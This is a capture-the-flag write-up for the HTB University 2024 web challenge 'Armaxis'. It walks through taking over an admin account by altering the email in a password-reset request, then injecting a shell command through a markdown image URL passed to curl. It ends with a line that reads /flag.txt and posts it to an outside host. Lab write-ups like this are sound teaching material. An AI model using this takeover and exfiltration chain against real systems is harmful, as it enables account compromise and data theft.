HTB University 2024 - Web - Armaxis
In this challenge, we have two web services running, a mailbox with an associated email address [email protected] and some sort of login page.
After consulting the source code, a few things become apparent: we need to gain access to the [email protected] account with the admin role, to dispatch weapons. We can add a note when dispatching the weapons, and if the note contains a markdown formatted image tag: , the url will be extracted with this regex
content.replace(/\!\[.*?\]\((.*?)\)/g, (match, url)
and executed as so
execSync(`curl -s ${url}`)
We’ll start by creating an account with the email [email protected], and then request a password reset.
We then receive a password reset token: Use this token to reset your password: 3da2886c0dd2ddc79b924ccb65daed49
We will intercept the password reset request and change the email address to the one belonging to the admin:
POST /reset-password
{"token":"3da2886c0dd2ddc79b924ccb65daed49","newPassword":"password","email":"[email protected]"}
We can then login as the admin
POST /login
{"email":"[email protected]","password":"password"}
We can now dispatch the weapons and get the flag:
POST /weapons/dispatch
{"name":"test","price":1,"note":"","dispatched_to":"[email protected]"}
Et voila: HTB{l00k0ut_f0r_m4rkd0wn_LF1_1n_w1ld!_46beed0bb7a467fb9b00b66ce3abc4f5}
The command injection works as it is trying to execute this instruction :
execSync(`curl -s; cat /flag.txt | curl -d @- burp_url`)